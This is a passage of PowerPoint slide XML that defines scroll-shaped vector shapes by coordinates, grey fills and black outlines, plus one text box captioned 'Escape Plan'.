                  <a:pt x="71033" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="797215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961825" y="1448014"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107315" h="71754">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961825" y="1448014"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107315" h="71754">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608395" y="2602483"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143509">
                <a:moveTo>
                  <a:pt x="71033" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44843" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97304" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120221" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136430" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84169" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95627" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103732" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103732" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95627" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84169" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608395" y="2602483"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143509">
                <a:moveTo>
                  <a:pt x="142578" y="71544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="136430" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120221" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97304" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22102" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44843" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84169" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84169" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71033" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032714" y="1306236"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71754">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032714" y="1306236"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71754">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2890935" y="2602484"/>
            <a:ext cx="0" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032713" y="1589790"/>
            <a:ext cx="869517" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="438785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="438468" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608394" y="130623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32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043381" y="28860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33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941722" y="1825817"/>
            <a:ext cx="761301" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="166106" marR="10067" indent="-142197">
              <a:lnSpc>
                <a:spcPts val="1784"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1585" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ape  Plan</a:t>
            </a:r>
            <a:endParaRPr sz="1585">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460000" y="4607617"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="652592" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5E5E5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460000" y="4607617"/>
            <a:ext cx="1435776" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="724535" h="797560">
                <a:moveTo>
                  <a:pt x="71544" y="797215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45274" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148727" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164936" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187853" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724137" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717988" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701779" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678862" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652592" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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38" name="object 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813430" y="4749395"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107315" h="71755">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813430" y="4749395"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
